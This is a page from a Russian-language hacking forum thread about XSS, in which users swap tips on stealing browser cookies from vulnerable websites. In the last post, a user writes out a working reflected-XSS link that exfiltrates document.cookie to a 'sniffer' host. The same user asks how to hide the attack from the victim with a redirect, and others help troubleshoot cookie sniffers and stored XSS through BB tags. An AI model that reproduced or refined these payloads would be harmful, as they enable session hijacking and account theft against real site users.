HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Перезагрузить страницу XSS [Mega Big Bug]
   
Ответ
Страница 19 из 22 « Первая < 9 15 16 17 18 19 20 21 22 >
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 28.03.2013, 01:00
Nick Hander
Познавший АНТИЧАТ
Регистрация: 30.03.2010
Сообщений: 1,068
С нами: 8484086

Репутация: 335


По умолчанию
dddoomsday
Чтобы обрабатывался скрипт, нужно код заключить в функциональный тэг script или атрибуты - обработчики событий. если ты просто запилишь картинку сниффера, куки не украдешь.
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 28.03.2013, 01:00
Nigerman666
Познающий
Регистрация: 02.07.2012
Сообщений: 52
С нами: 7296086

Репутация: 0
По умолчанию
у меня на нашем hpc снифере не приходят
куки!
Первый раз пришли (мои же), а потом вообще
перестали. В чем проблема?
 
Ответить с цитированием

  #3  
Старый 29.03.2013, 01:00
dddoomsday
Новичок
Регистрация: 24.03.2013
Сообщений: 7
С нами: 6914486

Репутация: -2
По умолчанию
а спомощью bb тэга активный xss можно осуществить?

пожалуйста приведите примеры.
 
Ответить с цитированием

  #4  
Старый 30.03.2013, 01:00
dddoomsday
Новичок
Регистрация: 24.03.2013
Сообщений: 7
С нами: 6914486

Репутация: -2
По умолчанию
почему молчите?
 
Ответить с цитированием

  #5  
Старый 30.03.2013, 01:00
Nick Hander
Познавший АНТИЧАТ
Регистрация: 30.03.2010
Сообщений: 1,068
С нами: 8484086

Репутация: 335


По умолчанию
dddoomsday
Теоретически можно, все зависит от фильтра на стороне сервера. XSS - это лишь явление, достичь его можно многими путями с помощью пентеста и экспериментирования.
 
Ответить с цитированием

  #6  
Старый 30.03.2013, 01:00
Nigerman666
Познающий
Регистрация: 02.07.2012
Сообщений: 52
С нами: 7296086

Репутация: 0
По умолчанию
Мне кто-нибудь ответит?
 
Ответить с цитированием

  #7  
Старый 30.03.2013, 01:00
HackSale
Постоянный
Регистрация: 22.12.2012
Сообщений: 336
С нами: 7046966

Репутация: 4
По умолчанию
Используй другой сниффер, хз в чем проблема
 
Ответить с цитированием

  #8  
Старый 30.03.2013, 01:00
noizZzefan
Постоянный
Регистрация: 01.03.2012
Сообщений: 620
С нами: 7473206

Репутация: 41


По умолчанию
Цитата:

Сообщение от Nigerman666

Мне кто-нибудь ответит?

Было предположение что на атакуемом сайте дыру залотали ?
 
Ответить с цитированием

  #9  
Старый 30.03.2013, 01:00
Nigerman666
Познающий
Регистрация: 02.07.2012
Сообщений: 52
С нами: 7296086

Репутация: 0
По умолчанию
Цитата:

Сообщение от noizZzefan

Было предположение что на атакуемом сайте дыру залотали ?

дыра осталась..
 
Ответить с цитированием

  #10  
Старый 30.03.2013, 01:00
dddoomsday
Новичок
Регистрация: 24.03.2013
Сообщений: 7
С нами: 6914486

Репутация: -2
По умолчанию
Столкулся с такой проблемой, почему то редирект не работает, на одном сайте нашел пассивку, уязвимость существует на поисковике сайта.
Ядовитая ссылка: http://уязвимый.сайт.ру/search/all?q="> img = new Image(); img.src = "http://сниффер.ру/s.gif?"+document.cookie;
cookies приходит нормально), но ппц палится, просто на просто этот код "> img = new Image(); img.src = "http://сниффер.ру/s.gif?"+document.cookie; остается на поисковике уязвимого сайта и не направляет на другой сайт. В чем может быть проблема?

если использовать location.href ="http://адрес_редиректа/" то куки вообще не приходит.
 
Ответить с цитированием
Ответ
Страница 19 из 22 « Первая < 9 15 16 17 18 19 20 21 22 >



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.